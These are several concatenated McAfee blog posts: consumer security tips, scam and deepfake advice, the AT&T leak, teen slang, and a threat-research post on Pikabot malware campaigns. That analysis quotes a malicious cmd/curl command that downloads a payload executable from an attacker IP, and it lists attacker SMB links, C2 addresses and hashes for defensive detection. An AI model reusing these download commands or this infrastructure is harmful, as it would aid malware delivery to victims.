Understanding what a malicious or scam app looks like can help you avoid downloading a fraudulent app. For example, many fraud apps have very short descriptions or reviews from people who have previously been duped. In addition to scrutinizing the descriptions and reviews of apps, it’s essential to download apps only from trusted sources such as official app stores like Google Play Store or Apple App Store. Third-party app stores or unknown websites may host malicious apps. 

Re-check 

Fraudsters excel at creating seemingly legitimate apps to carry out scams, often by deploying deceptive tactics such as requesting unnecessary permissions or operating stealthily in the background. Exercise caution and conduct thorough checks of device settings whenever installing a new app. 

It’s also essential to remain vigilant for indicators of suspicious activity, especially if you may have installed apps without security checks in the past. Be on the lookout for anomalies, such as unauthorized subscriptions, unfamiliar social media logins, or unusually rapid battery drain, which could signal the presence of fraudulent apps operating without their knowledge. Some malicious apps may also consume data in the background, leading to unusual spikes in data usage. Regularly monitoring data usage can help individuals detect and address any unauthorized app activity. 

Revoke 

Over time, it’s easy to inadvertently grant excessive permissions to apps or connect accounts to services that you no longer use or trust. This can create vulnerabilities that malicious actors could exploit to gain unauthorized access to sensitive information. 

Conduct an app review on your phone and revoke permissions or access granted to apps or services that are no longer needed or trusted. It’s essential to regularly audit and remove unnecessary permissions, apps, or connections to minimize the potential attack surface and reduce the risk of unauthorized access. 

Reinforce 

Reinforce your security posture with modern tools. Antivirus software remains a cornerstone of digital defense, offering proactive detection and mitigation of various threats, including malware, ransomware, and phishing attempts. For enhanced protection, consumers can opt for comprehensive security suites such as McAfee+, which not only includes antivirus capabilities but also integrates features like firewall protection, secure browsing, and identity theft prevention. 

By leveraging these advanced security solutions, users can significantly reduce their vulnerability to cyberattacks and safeguard their personal and sensitive information effectively. Additionally, staying informed about emerging threats and regularly updating security software ensures ongoing resilience against evolving cyber threats in today’s dynamic digital landscape. 

The post The Four Rs of Personal Mobile Security appeared first on McAfee Blog.

Distinctive Campaign Evolution of Pikabot Malware

Authored by Anuradha and Preksha

Introduction

PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a loader and a core component. The core module performs malicious operations, allowing for the execution of commands and the injection of payloads from a command-and-control server. The malware employs a code injector to decrypt and inject the core module into a legitimate process. Notably, PikaBot employs distribution methods, campaigns, and behavior reminiscent of Qakbot.

Distribution Methods

PikaBot, along with various other malicious loaders like QBot and DarkGate, heavily depends on email spam campaigns for distribution. Its initial access strategies are intricately crafted, utilizing geographically targeted spam emails tailored for specific countries. These emails frequently include links to external Server Message Block (SMB) shares hosting malicious zip files.

SMB shares refer to resources or folders on a server or computer accessible to other devices or users on a network using the SMB protocol. The threat actors frequently exploit such shares for malware distribution. In this instance, the act of downloading and opening the provided zip file leads to PikaBot infection.

Distinctive Campaigns

During February 2024, McAfee Labs observed a significant change in the campaigns that distribute Pikabot.

Pikabot is distributed through multiple file types for various reasons, depending on the objectives and nature of the attack. Using multiple file types allows attackers to exploit diverse attack vectors. Different file formats may have different vulnerabilities, and different ways of detection by security software so attackers may try various formats to increase their chances of success and evade detection by bypassing specific security measures.

Attackers often use file types that are commonly trusted by users, such as Zip or Office documents, to trick users into opening them. By using familiar file types, attackers increase the likelihood that their targets will interact with the malicious content. Malware authors use HTML with JavaScript features as attachments, a common technique, particularly when email formatting is converted to plain text, resulting in the attachment of the HTML content directly to the email. Attackers use SMB to propagate across the network and may specifically target SMB shares to spread their malware efficiently. Pikabot takes advantage of the MonikerLink bug and attaches an SMB link in the Outlook mail itself.

Figure 1. Distinctive Campaigns of Pikabot

Attackers demonstrated a diverse range of techniques and infection vectors in each campaign, aiming to deliver the Pikabot payload. Below we have summarized the infection vector that has been used in each campaign.

1. HTML
2. Javascript
3. SMB Share
4. Excel
5. JAR

It is uncommon for an adversary to deploy so many attack vectors in the span of a month.

Campaign Analysis

In this section, a comprehensive breakdown of the analysis for each campaign is presented below.

1.HTML Campaign

In this campaign, Pikabot is distributed through a zip file that includes an HTML file. This HTML file then proceeds to download a text file, ultimately resulting in the deployment of the payload.

The below HTML code is a snippet from the malware where it is a properly aligned HTML that has a body meta redirection to a remote text file hosted at the specified URL. There are distractions in the HTML which are not rendered by the browser.

Figure 2.HTML Code

The above highlighted meta tag triggers an immediate refresh of the page and redirects the browser to the specified URL: ‘file://204.44.125.68/mcqef/yPXpC.txt’. This appears to be a file URL, pointing to a text file on a remote server.

Here are some reasons why an attacker might choose a meta tag refresh over traditional redirects:

Stealth and Evasion: Meta tag refreshes can be less conspicuous than HTTP redirects. Some security tools and detection mechanisms may be more focused on identifying and blocking known redirect patterns.

Client-Side Execution: Meta tag refreshes occur on the client side (in the user’s browser), whereas HTTP redirects are typically handled by the server. This may allow attackers to execute certain actions directly on the user’s machine, making detection and analysis more challenging.

Dynamic Behavior: Meta tag refreshes can be dynamically generated and inserted into web pages, allowing attackers to change the redirection targets more easily and frequently. This dynamic behavior can make it harder for security systems to keep up with the evolving threat landscape.

In this campaign, McAfee blocks the HTML file.

Figure 3.HTML file

2. Javascript Campaign

Distributed through a compressed zip file, the package includes a .js file that subsequently initiates the execution of curl.exe to retrieve the payload.

Infection Chain:

.zip->.js->curl->.exe

Code snippet of .js file:

Figure 4. Javascript Code

When the JavaScript is executed, it triggers cmd.exe to generate directories on the C: drive and initiates curl.exe to download the payload.

Since the URL “hxxp://103.124.105.147/KNaDVX/.dat” is inactive, the payload is not downloaded to the below location.

Commandline:

‘”C:\Windows\System32\cmd.exe” /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh & curl hxxp://103.124.105.147/KNaDVX/0.2642713404338389.dat –output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe’

McAfee blocks both the javascript and the exe file thus rendering McAfee customers safe from this campaign.

Figure 5. JS file

Figure 6. EXE file

3. SMB share Campaign:

In this campaign, Malware leverages the MonikerLink bug by distributing malware through email conversations with older thread discussions, wherein recipients receive a link to download the payload from an SMB share. The link is directly present in that Outlook mail.

Infection Chain:

EML ->SMB share link->.zip->.exe

Spam Email:

Figure 7. Spam email with SMB share link

SMB Share link: file://newssocialwork.com/public/FNFY.zip

In this campaign, McAfee successfully blocks the executable file downloaded from the SMB share.

Figure 8. EXE file

 4: Excel Campaign

Figure 9. Face in Excel

Infection Chain:

.zip >.xls > .js > .dll

This week, threat actors introduced a novel method to distribute their Pikabot malware. Targeted users received an Excel spreadsheet that prompted them to click on an embedded button to access “files from the cloud.”

Upon hovering over the “Open” button, we can notice an SMB file share link -file:///\\85.195.115.20\share\reports_02.15.2024_1.js.

Bundled files in Excel:

Figure 10. Bundled files inside Excel

The Excel file doesn’t incorporate any macros but includes a hyperlink directing to an SMB share for downloading the JavaScript file.

The hyperlink is present in the below relationship file.

Figure 11. XML relationship file

Content of relationship file:

Figure 12. xl/drawings/_rels/drawing1.xml.rels

Code of JS file:

Figure 13. Obfuscated javascript code

The JS file contains mostly junk codes and a small piece of malicious code which downloads the payload DLL file saved as “nh.jpg”.

Figure 14. Calling regsvr32.exe

The downloaded DLL payload is executed by regsvr32.exe.

In this campaign, McAfee blocks the XLSX file.

Figure 15. XLSX file

5.JAR Campaign

In this campaign, distribution was through a compressed zip file, the package includes a .jar file which on execution drops the DLL file as payload.

Infection Chain:

.zip>.jar>.dll

On extraction, the below files are found inside the jar file.

Figure 16. Extraction of JAR file

The MANIFEST file indicates that hBHGHjbH.class serves as the Main-Class in the provided files.

The jar file on execution loads the file “163520” as a resource and drops it as .png to the %temp% location which is the payload DLL file.

Figure 17. Payload with .png extension

Following this, java.exe initiates the execution of regsvr32.exe to run the payload.

In this campaign, McAfee blocks both the JAR and DLL files.

Figure 18. JAR file

Figure 19. DLL file

Pikabot Payload Analysis:

Pikabot loader:

Due to a relatively high entropy of the resource section, the sample appears packed.

Figure 20. Loader Entropy

Initially, Malware allocates memory using VirtualAlloc (), and subsequently, it employs a custom decryption loop to decrypt the data, resulting in a PE file.

Figure 21. Decryption Loop

Figure 22. Decrypted to get the PE file

Core Module:

Once the data is decrypted, it proceeds to jump to the entry point of the new PE file. When this PE file gets executed, it injects the malicious content in ctfmon.exe with the command line argument “C:\Windows\SysWOW64\ctfmon.exe -p 1234”

Figure 23. Injection with ctfmon.exe

To prevent double infection, it employs a hardcoded mutex value {9ED9ADD7-B212-43E5-ACE9-B2E05ED5D524} by calling CreateMutexW(), followed by a call to GetLastError() to check the last error code.

Figure 24. Mutex

Network communication:

Malware collects the data from the victim machine and sends it to the C2 server.

Figure 25. Network activity

PIKABOT performs network communication over HTTPS on non-traditional ports (2221, 2078, etc).

Figure 26. Network activity

C2 server communication:

Figure 27. C2 communication

IOCs:

C2 found in the payload are:

178.18.246.136:2078

86.38.225.106:2221

57.128.165.176:1372

File Type	SHA 256
ZIP	800fa26f895d65041ddf12c421b73eea7f452d32753f4972b05e6b12821c863a
HTML	9fc72bdf215a1ff8c22354aac4ad3c19b98a115e448cb60e1b9d3948af580c82
ZIP	4c29552b5fcd20e5ed8ec72dd345f2ea573e65412b65c99d897761d97c35ebfd
JS	9a4b89276c65d7f17c9568db5e5744ed94244be7ab222bedd8b64f25695ef849
EXE	89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9
ZIP	f3f1492d65b8422125846728b320681baa05a6928fbbd25b16fa28b352b1b512
EXE	aab0e74b9c6f1326d7ecea9a0de137c76d52914103763ac6751940693f26cbb1
XLSX	bcd3321b03c2cba73bddca46c8a509096083e428b81e88ed90b0b7d4bd3ba4f5
JS	49d8fb17458ca0e9eaff8e3b9f059a9f9cf474cc89190ba42ff4f1e683e09b72
ZIP	d4bc0db353dd0051792dd1bfd5a286d3f40d735e21554802978a97599205bd04
JAR	d26ab01b293b2d439a20d1dffc02a5c9f2523446d811192836e26d370a34d1b4
DLL	7b1c5147c903892f8888f91c98097c89e419ddcc89958a33e294e6dd192b6d4e

 

 

The post Distinctive Campaign Evolution of Pikabot Malware appeared first on McAfee Blog.

Are You a Victim of a Deepfake Attack? Here’s What to Do Next

With the rise of cheap and easy-to-use AI tools, deepfake attacks find themselves likewise on the rise. Startling as that news might sound, you have several ways of falling victim to one. 

Right now, we’re seeing plenty of AI voice cloning tools used in deepfake attacks. These attacks work much like classic targeted phishing attacks, also known as “spearphishing,” given the precision scammers use to pull them off.  

It works like this:  

A scammer identifies a target, gathers info on them, and then uses that info against them in a deepfake attack. With info gathered from their social media profiles, public records, “people finder” sites, and data broker sites, scammers create convincing-sounding messages with AI voice-cloning tools.  

All they need is a script and a sample of a person’s voice that they want to impersonate — pulled from, say, YouTube, a social media video, a conference call, what have you. Just a few minutes does the trick, creating a voice clone that requires an expert to detect. 

Between an uncanny voice clone and a script peppered with all kinds of personal details, these deepfake messages sound legit. 

Moreover, scammers use another tool to get their victims to act. Urgency. They play on people’s emotions so that they’ll take the bait in the head of the moment. Imagine a deepfake message that sounds like it’s from a friend or family member. Their car broke down in the middle of nowhere and they need money for a repair or they run into trouble while traveling abroad and likewise need money to get out of a jam. In all, the voice clone says it needs help and needs it now. 

Before the victim knows it, they’ve readily handed over funds, personal info, or both to a scammer — which leads to things like identity theft and fraud. 

As these attacks started cropping up last year, we surveyed people worldwide to get a sense of just how often they occur. Out of 7,000 people surveyed, one in four said that they had experienced an AI voice cloning scam or knew someone who had. 

Moreover, those attacks came at a cost. Of the people who reported losing money to an audio deepfake, 36% said they lost between $500 and $3,000, while 7% got taken for sums anywhere between $5,000 and $15,000. 

Again, as even as convincing as these deepfake messages might sound, you can keep yourself safer from these attacks. It starts with keeping your personal info out of the hands of scammers. 

How to prevent deepfake attacks. 

Make your social media more private. Our new McAfee Social Privacy Manager personalizes your privacy based on your preferences. It does the heavy lifting by adjusting more than 100 privacy settings across your social media accounts in only a few clicks. This makes sure that your personal info is only visible to the people you want to share it with. It also keeps it out of search engines where the public, and scammers, can see it.

Remove your info from data brokers that sell it. McAfee Personal Data Cleanup helps you remove your personal info from many of the riskiest data broker sites out there. Running it regularly can keep your name and info off these sites, even as data brokers collect and post new info. Depending on your plan, it can send requests to remove your data automatically.  

Delete your old accounts. Yet another source of personal info comes from data breaches. Scammers use this info as well to complete a sharper picture of their potential victims. With that, many internet users can have over 350 online accounts, many of which they might not know are still active. McAfee Online Account Cleanup can help you delete them. It runs monthly scans to find your online accounts and shows you their risk level. From there, you can decide which to delete, protecting your personal info from data breaches and your overall privacy as a result. 

Set a verbal password with your friends and family. Several deepfake attacks involve an urgent voice message from a friend or family member. Setting a verbal password like you do with banks and alarm companies can help determine if a message is real or fake. Make sure everyone knows and uses it in messages when they ask for help. 

How to recover from a deepfake attack. 

Typically, deepfake attacks lead to some kind of fraud. Victims hand over money, personal info, credit card numbers, and gift cards after being taken in by the fraudster. So while deepfakes are new, the attack itself plays out like an age-old con game. With the age-old results. Given that, recovering from a deepfake attack follows the same steps it takes to recover from practically any type of fraud. 

File a police report. 

Someone stole from you. Treat fraud like the crime it is. Start by contacting law enforcement to file a report. Your local police department can issue a formal report, which you might need to get your bank or other financial institution to reverse fraudulent charges.  

Before contacting the police, gather all the relevant info about what happened. This could include the dates and times of fraudulent activity and any account numbers affected. Bringing copies of your bank statements can be useful. Also, make note of any suspicious activity that might be related. For example, was your debit card recently lost or your email hacked? The police will want to know. 

Notify the companies involved. 

Depending on how you responded to the deepfake, the companies involved might include banks, credit card companies, the providers of gift cards, and other money transfer services. Each will have a method of reporting fraud. Some might offer ways to reverse the charges or recoup the funds. But not always. Scammers ask for payment in gift cards and money transfers for a reason. They’re as good as cash. After that money is gone, it’s likely gone for good. 

In the U.S., File a report with the Federal Trade Commission. 

In the U.S., the Federal Trade Commission (FTC) hosts IdentityTheft.gov where you can further report such crimes. Along with the details you provide, it can create a free recovery plan you can use to address the effects of identity theft, like contacting the major credit bureaus or alerting the Internal Revenue Service (IRS) fraud department. You can report your case online or by calling 1-877-438-4338. 

For another excellent resource from the FTC, you can visit their page dedicated to scam recovery. It offers detailed guidance for several types of scams and what to do if you fall victim to one.   

And outside of the U.S. 

Our knowledge base article on identity theft offers suggestions for the specific steps you can take in specific countries, along with helpful links for local authorities that you can turn to for reporting and assistance. 

Put a freeze on your credit to prevent further theft. 

A credit freeze is another smart move, which you can do through each of the three major credit bureaus. You can either call them or start the process online. This prevents people from accessing your credit report. Lenders, creditors, retailers, landlords, and others might want to see your credit as proof of financial stability. For example, if someone tries to open a phone contract under your name, the retailer might check the credit report. If there is a credit freeze in place, they won’t be able to view it and won’t issue the contract. If you need to allow someone access to your credit report, you can temporarily lift the freeze. And depending on your plan, you can issue a credit freeze or an even more comprehensive security freeze right from the McAfee app. 

Use identity theft coverage to recover from deepfake fraud. 

Having coverage in place before an attack can save you time and money should the unexpected happen. Our Identity Theft & Restoration Coverage can help. It offers $2 million in coverage and assistance from a licensed identity restoration pro who can repair your identity and your credit after an attack. 

The post Are You a Victim of a Deepfake Attack? Here’s What to Do Next appeared first on McAfee Blog.

Watch Out For IRS Scams and Avoid Identity Theft

As taxpayers prepare their returns for April 15^th, scammers prepare too. They see tax season as high time to run all kinds of scams and identity theft schemes.

Fake accountants, fake tax software, robocalls, and more all make the list. We’ll give you a look at what’s happening out there right now. And we’ll run down several ways you can keep safe.

Impersonation Schemes

A commonly used tactic involves hackers posing as collectors from the IRS, as tax preparers, or government bureaus. This tactic is pretty effective due to Americans’ concerns about misfiling their taxes or accidentally running into trouble with the IRS. Scammers take advantage of this fear, manipulating innocent users into providing sensitive information or money over the phone or by email. And in extreme cases, hackers may be able to infect computers with malware via malicious links or attachments sent through IRS email scams.

Robocalls

Another tactic used to take advantage of taxpayers is the canceled social security number scam. Hackers use robocalls claiming that law enforcement will suspend or cancel the victim’s Social Security number in response to taxes owed. Often, victims are scared into calling the fraudulent numbers back and persuaded into transferring assets to accounts that the scammer controls. Users need to remember that the IRS will only contact taxpayers through snail mail or in person, not over the phone.

Emails

Another scam criminals use involves emails impersonating the IRS. Victims receive a phishing email claiming to be from the IRS, reminding them to file their taxes or offering them information about their tax refund via malicious links. If a victim clicks on the link, they will be redirected to a spoofed site that collects the victim’s personal data, facilitating identity theft. What’s more, a victim’s computer can become infected with malware if they click on a link with malicious code, allowing fraudsters to steal more data.

Phony CPAs

Scammers also take advantage of the fact that many users seek out the help of a tax preparer or CPA during this time. These criminals will often pose as professionals, accepting money to complete a user’s taxes but won’t sign the return. This makes it look like the user completed the return themselves. However, these ghost tax preparers often lie on the return to make the user qualify for credits they haven’t earned or apply changes that will get them in trouble. Since the scammers don’t sign, the victim will then be responsible for any errors. This could lead to the user having to repay money owed, or potentially lead to an audit.

While these types of scams can occur at any time of the year, they are especially prevalent leading up to the April tax filing due date. Consumers need to be on their toes during tax season to protect their personal information and keep their finances secure. To avoid being spoofed by scammers and identity thieves, follow these tips:

File before cybercriminals do it for you. The easiest defense you can take against tax seasons schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a cybercriminal.

Keep an eye on your credit and your identity. Keeping tabs on your credit report and knowing if your personal information has been compromised in some way can help prevent tax fraud. Together, they can let you know if someone has stolen your identity or if you have personal info on the dark web that could lead to identity theft.

• Our credit monitoring servicecan keep an eye on changes to your credit score, report, and accounts with timely notifications and guidance so you can take action to tackle identity theft.
• Our identity monitoring servicechecks the dark web for your personal info, including email, government IDs, credit card and bank account info, and more—then provides alerts if your data is found on the dark web, an average of 10 months ahead of similar services.​

 

Beware of phishing attempts. It’s clear that phishing is the primary tactic crooks are leveraging this tax season, so it’s crucial you stay vigilant around your inbox. This means if any unfamiliar or remotely suspicious emails come through requesting tax data, double check their legitimacy with a manager or the security department before you respond. Remember: the IRS will not initiate contact with taxpayers by email, text messages, or social media channels to request personal or financial info. So someone contacts you that way, ignore the message.

Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.

Protect yourself from scam messages. Scammers also send links to scam sites via texts, social media messages, and email. McAfee Scam Protection can help you spot if the message you got is a fake. It uses AI technology that automatically detects links to scam URLs. If you accidentally click, don’t worry, it can block risky sites if you do.

Clean up your personal info online. Crooks and scammers have to find you before they can contact you. After all, they need to get your phone number or email from somewhere. Sometimes, that’s from “people finder” and online data brokers that gather and sell personal info to any buyer. Including crooks. McAfee Personal Data Cleanup can remove your personal info from the data broker sites scammers use to contact their victims.

Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

The post Watch Out For IRS Scams and Avoid Identity Theft appeared first on McAfee Blog.

AT&T Data Leak: What You Need to Know and How to Protect Yourself

AT&T, one of the largest telecom giants, recently acknowledged a significant data leak that has affected millions of its customers. The leaked dataset, which includes personal information such as names, addresses, phone numbers, and Social Security numbers, has raised concerns about privacy and security. In this blog post, we will provide an overview of the situation, explain the steps AT&T is taking to address the issue, and offer guidance on how you can protect yourself.

The Data Leak: AT&T has confirmed that the leaked dataset contains information from over 7.6 million current customers and 65 million former customers. The compromised data may include full names, email addresses, mailing addresses, phone numbers, Social Security numbers, dates of birth, AT&T account numbers, and passcodes. The company has reset the security passcodes of affected active customers.

AT&T’s Response: AT&T is actively reaching out to affected customers via email or letter to inform them about the data that was included in the leak and the measures being taken to address the situation. The company has also initiated a thorough investigation, working with external cybersecurity experts to analyze the incident. So far, there is no evidence of authorized access to AT&T’s systems resulting in data exfiltration.

Protecting Yourself: If you are an AT&T customer, it is crucial to take steps to protect yourself from potential fraud or identity theft. AT&T recommends setting up free fraud alerts with credit bureaus Equifax, Experian, and TransUnion. These alerts can help notify you of any suspicious activity related to your personal information. Additionally, consider implementing the following measures:

1. Monitor Your Accounts: Regularly review your bank statements, credit card statements, and other financial accounts for any unauthorized transactions.
2. Change Passwords: Update your passwords for all online accounts, including your AT&T account. Use strong, unique passwords and consider using a password manager to securely store them.
3. Enable Two-Factor Authentication: Enable two-factor authentication whenever possible to add an extra layer of security to your accounts.
4. Be Cautious of Phishing Attempts: Stay vigilant against phishing emails, calls, or texts that may try to trick you into revealing sensitive information. Be skeptical of any unsolicited communications and verify the source before sharing any personal data
5. Enroll in an Identity Monitoring service. McAfee+ can help keep your personal info safe, with early alerts if your data is found on the dark web. We’ll monitor the dark web for your personal info, including email, government IDs, credit card and bank account numbers, and more

McAfee+ automatically monitors your personal data, including your:

✓ Social Security Number / Government ID
✓ Driver’s license number
✓ Passport number
✓ Tax ID
✓ Date of birth
✓ Credit card numbers
✓ Bank account numbers
✓ Usernames
✓ Insurance ID cards
✓ Email addresses
✓ Phone numbers

AT&T’s data leak is a concerning incident that highlights the importance of safeguarding personal information in the digital age. By staying informed, taking proactive measures to protect yourself, and remaining vigilant against potential threats, you can minimize the risk of falling victim to fraud or identity theft. Remember, your privacy and security are paramount, and it’s crucial to stay one step ahead of cybercriminals.

The post AT&T Data Leak: What You Need to Know and How to Protect Yourself appeared first on McAfee Blog.

How to Protect Your Digital Identity

People under 60 are losing it online. And by it, I mean money—thanks to digital identity theft. 

In its simplest form, your digital identity is made up of a whole host of things that can be traced back to you and who you are. That can range anywhere from photos you post online to online shopping accounts, email accounts to telephone numbers, and bank accounts to your tax ID.  

In this way, your digital identity is like dozens upon dozens of puzzle pieces made up of different accounts, ID numbers, and so forth. When put together, they create a picture of you. And that’s why those little puzzle pieces of your identity are such attractive targets for hackers. If they get the right combination of them, you can end up a victim of theft or fraud.  

People under 60 are major targets for fraud 

Here’s what’s happening: people under 60 were twice as likely to report losing money while shopping online. The spotlight also shows that adults under 60 are more than four times more likely to report losing money to an investment scam, and the majority of those losses happened in scams involving some form of cryptocurrency investments.

And it’s no surprise younger adults get targeted this way. They’re far more likely than any other age group to use mobile apps for peer-to-peer payments, transfer money between accounts, deposit checks, and pay bills. In short, there’s a lot of money flowing through the palms of their hands thanks to their phones, as well as their computers. 

Protecting yourself from hackers and fraud means protecting your digital identity. And that can feel like a pretty huge task given all the information your digital identity includes. It can be done, though, especially if you think about your identity like a puzzle. A piece here, another piece there, can complete the picture (or complete it just enough) to give a hacker what they need to separate you from your money. Thus, the way to stay safe is to keep those puzzle pieces out of other people’s hands.  

Six ways you can protect your digital identity from hackers and fraud 

It’s actually not that tough. With a few new habits and a couple of apps to help you out, you can protect yourself from the headaches and flat-out pain of fraud. Here’s a list of straightforward things that you can get started on right away: 

1. Start with the basics—security software  

Protect yourself by protecting your stuff. Installing and using security software on your computers and phones can prevent all kinds of attacks and make you safer while you surf, bank, and shop online. I should emphasize it again—protect your phone. Only about half of people protect their phones even though they use them to hail rides, order food, send money to friends, and more. Going unprotected on your phone means you’re sending all that money on the internet in a way that’s far, far less safe than if you use online protection. 

2. Create strong passwords  

You hear this one all the time and for good reason—strong, unique passwords offer one of your best defenses against hackers. Never re-use them (or slight alterations of them) across the different platforms and services you use. Don’t forget to update them on the regular (that means at least every 60 days)! While that sounds like a lot of work, a password manager can keep on top of it all for you. And if your platform or service offers the use of two-factor authentication, definitely make use of that. It’s a further layer of security that makes hacking tougher for crooks. 

3. Keep up to date with your updates  

Updates have a way of popping up on our phones and computers nearly every day, resist the urge to put them off until later. Aside from making improvements, updates often include important security fixes. So, when you get an alert for your operating system or app on your devices, go ahead and update. Think of it as adding another line of defense from hackers who are looking to exploit old flaws in your apps.   

4. Think twice when you share  

Social media is one place hackers go to harvest personal information because people sometimes have a way of sharing more than they should. With info like your birthday, the name of your first school, your mother’s maiden name, or even the make of your first car, they can answer common security questions that could hack into your accounts. Crank up the privacy settings on your accounts so only friends and family can see your posts—and realize the best defense here is not to post any possibly sensitive info in the first place. Also, steer clear of those “quizzes” that sometimes pop up in your social feeds. Those are other ways that hackers try to gain bits of info that can put your identity at risk. 

5. Shred it  

Even though so many of us have gone paperless with our bills, identity theft by digging through the trash, or “dumpster diving,” is still a thing. Things like medical bills, tax documents, and checks still might make their way to your mailbox. You’ll want to dispose of them properly when you’re through with them. First, invest in a paper shredder. Once you’ve online deposited that check or paid that odd bill, shred it so that any personal or account info on there can’t be read (and can be recycled securely). Second, if you’re heading out of town for a bit, have a friend collect your mail or have the post office put a temporary hold on your mail. That’ll prevent thieves from lifting personal info right from your mailbox while you’re away. 

6. Check your credit  

Even if you don’t think there’s a problem, go ahead and check your credit. The thing is, someone could be charging things against your name without you even knowing it. Depending on where you live, different credit reporting agencies keep tabs on people’s credit. In the U.S., the big ones are Equifax, Experian, and TransUnion. Also in the U.S., the Fair Credit Reporting Act (FCRA) requires these agencies to provide you with a free credit check at least once every 12 months. Canada, the UK, and other nations likewise offer ways to get a free credit report. Run down your options—you may be surprised by what you find. 

How do I know if my identity has been stolen?  

As I just mentioned, the quickest way to get sense of what’s happening with your identity is to check your credit. Identity theft goes beyond money. Crooks will steal identities to rent apartments, access medical services, and even get jobs. Things like that can show up on a credit report, such as when an unknown address shows up in a list of your current and former residences or when a company you’ve never worked for shows up as an employer. If you spot anything strange, track it down right away. Many businesses have fraud departments with procedures in place that can help you clear your name if you find a charge or service wrongfully billed under your name. 

Other signs are far more obvious. You may find collection agencies calling or even see tax notices appearing in your mailbox (yikes). Clearly, cases like those are telltale signs that something is really wrong. In that case, report it right away: 

• If you live in the U.S. and think that someone is using your personal information, visit IdentityTheft.gov. 
• In Canada, visit antifraudcentre-centreantifraude.ca for help.  
• And in the UK, check out CIFAS, the UK’s fraud prevention service, at cifas.org.uk. 

Likewise, many nations offer similar government services. A quick search will point you in the right direction. 

Another step you can take is to ask each credit bureau to freeze your credit, which prevents crooks from using your personal information to open new lines of credit or accounts in your name. Fraud alerts offer another line of protection for you as well, and you can learn more about fraud alerts here. 

Keeping your digital identity in your hands 

With so many bits and pieces of information making up your digital identity, a broader way of keeping it safe involves asking yourself a question: what could happen if someone got their hands on this info? Further realizing that even little snippets of unsecured info can lead to fraud or theft in your name helps—even that un-shredded bill or innocuous refund check for a couple of bucks could give a crook the puzzle piece they need. You can keep your digital identity safe by keeping those pieces of info out of other people’s hands.    

The post How to Protect Your Digital Identity appeared first on McAfee Blog.

Teen Slang – What You Need To Know To Understand Your Teen

Got any ‘rizz’? Did you ‘slay’ that dinner? Is the ‘cozzie livs’ stressing you out? 

If you do not comprehendo, then you wouldn’t be alone. As a mum of 4, I can attest that understanding teenage slang can be quite the feat – as soon as you finally understand a few terms, there’s more! And while you don’t want to seem too intrusive (or uncool) and constantly ask your kids to translate, you probably want to keep a handle on what’s going on – in case you need to get involved!! 

Where Does Slang Come From and Why Do We Use It? 

Nothing ever stays the same and that includes language. Slang happens when we shorten words. Think fab instead of fabulous; or when we combine words think chill and relax = chillax. It can also ‘evolve’ when we give words new, unexpected meanings eg cheugy – a term to often describe older generations when they make an effort but fail – harsh!! 

And more often than not, words that end up becoming slang will become part of our everyday language. Did you know that the word ‘mad’ was in fact a slang word for angry that became popular around 100 years ago?  

Emily Brewster, senior editor at Merriam Webster Dictionary believes that ‘slang can be used to have a special form of communication with a subset of people.’ And ‘by using words that are only understood by the small group of people there’s an intimacy that can develop.’ So, really it’s a type of bonding tool!! 

What Slang Do You Need To Know Now 

While slang can sometimes be geographic based, the rise of platforms like TikTok have meant that its far more universal than it was in pre-social media days. So, if you’re keen to know the top words your kids are using so you ensure all is well, then here’s your go-to guide with the top 20 slang words. Apologies in advance for the potentially lewd references!! 

1. Addy – address
‘Can you send me your addy? I’ll be there soon.’

2. Based – when you agree with something; or when you want to recognize someone for being themselves
‘You’re going to that party? Based.’

3. Ate that – to successfully achieve something
‘I love that dress. You totally ate that look’ (the dress looked great on you)

 4. Basic – average
A word to describe someone who is predictable or bland. It’s an insult.

 5. Cappin – lying
‘He’s so cappin’ (he is so not telling the truth) 

 6. Cheugy – basic, out of date or trying too hard
‘My older brother still wears his uggs, that’s so cheugy!’ 

 7. Cozzie Livs – the cost of living crises
An Australian slang expression that was nominated as Macquarie Dictionary’s word of the year in 2023.
‘I can’t go out tonight. Especially with the cozzie livs and all that jazz.’ 

 8. Ded – so funny or embarrassing!
‘OMG. That pic has me ded’ 

 9. Delulu – a short-hand term for delusional. It’s often used to describe someone in a humorous way who chooses to reject reality in favour of a more interesting interpretation of events.
‘She’s so delulu. She thinks she’s going to marry the lead actor in her favourite movie.’

10. Gas Up – to encourage or hype someone up.
‘My sister was feeling down so I gassed her up and reminded her just how great she is.’ 

 11. Low key – The opposite of high key, it can mean slightly, occasionally, or even secretly.
‘I low key want a Poke bowl right now!’  

 12. High key – the opposite of ‘low key’. The term is used to when you really like something like something or want to emphasise it.
‘I high key love that brand’ (you’re a fan!) 

13. IFKKYK – if you know you know.
It means if you weren’t there, you wouldn’t know. It could also refer to an inside joke.
‘Last night’s concert was amazing! IFKKYK’

 14. No Cap – a term to emphasise that you’re not lying. A modern way of saying ‘I swear’
‘I saw him take the last biscuit. No cap’ 

15. Pop Off – when someone is doing well – often used in gaming.
‘Look at Ninja (streamer). He’s popping off on Fortnight’

16. Rizz – charisma. It can also describe one’s ability to attract a partner.
‘She’s got rizz!’ 

 17. Roman Empire – something you love and think about all the time. 
‘Visiting Paris is my Roman Empire’ or ‘America Ferrera’s Barbie monologue is my Roman Empire.’  

18. Salty – annoyed or upset.
‘I don’t know why he is so salty’. 

19. Simp – someone who tries too hard or goes above and beyond to impress the person they like.
‘He got her a ring after four dates. He’s such a simp!’ 

20. Slay – to do something exceedingly well.
‘He slayed that performance’. 

So, next time your teen drops a phrase or acronym they think you can’t decipher, you will have NP (no problem) understanding what’s happening in your kids’ lives and absolutely no FOMO (fear of missing out)! 

Good luck!! 

Alex x 

The post Teen Slang – What You Need To Know To Understand Your Teen appeared first on McAfee Blog.

Avoid Making Costly Mistakes with Your Mobile Payment Apps

